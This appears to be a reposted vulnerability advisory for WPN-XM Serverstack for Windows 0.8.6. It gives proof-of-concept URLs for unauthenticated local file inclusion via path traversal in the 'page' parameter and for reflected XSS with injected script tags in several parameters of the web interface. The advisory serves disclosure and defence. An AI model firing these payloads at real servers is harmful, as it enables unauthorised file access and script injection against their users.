WPN-XM Serverstack For Windows 0.8.6 XSS / LFI / Traversal – Torchsec
# Discovery by: Rafael Pedrero
# Discovery Date: 2022-02-13
# Vendor Homepage: http://wpn-xm.org/
# Software Link : https://github.com/WPN-XM/WPN-XM/
# Tested Version: 0.8.6
# Tested on: Windows 10 using XAMPP
# Vulnerability Type: Local File Inclusion (LFI) & directory traversal
(path traversal)
CVSS v3: 7.5
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CWE: CWE-829, CWE-22
Vulnerability description: WPN-XM Serverstack for Windows v0.8.6 allows
unauthenticated directory traversal and Local File Inclusion through the
parameter in an /tools/webinterface/index.php?page=..\..\..\..\..\..\hello
(without php) GET request.
Proof of concept:
To detect: http://localhost/tools/webinterface/index.php?page=)
The parameter "page" can be modified and load a php file in the server.
Example, In C:\:hello.php with this content:
C:\>type hello.php
echo "HELLO FROM C:\\hello.php";
?>
To Get hello.php in c:\ :
http://localhost/tools/webinterface/index.php?page=..\..\..\..\..\..\hello
Note: hello without ".php".
And you can see the PHP message into the browser at the start.
Response:
HELLO FROM C:\hello.php
# Vulnerability Type: reflected Cross-Site Scripting (XSS)
CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: WPN-XM Serverstack for Windows v0.8.6, does not
sufficiently encode user-controlled inputs, resulting in a reflected
Cross-Site Scripting (XSS) vulnerability via the
/tools/webinterface/index.php, in multiple parameters.
Proof of concept:
http://localhost/tools/webinterface/index.php?action=showtab%3Cscript%3Ealert(1);%3C/script%3E&page=config&tab=help
http://localhost/tools/webinterface/index.php?action=showtab&page=config%3Cscript%3Ealert(1);%3C/script%3E&tab=help
http://localhost/tools/webinterface/index.php?action=showtab&page=config&tab=help%3Cscript%3Ealert(1);%3C/script%3E
Gloss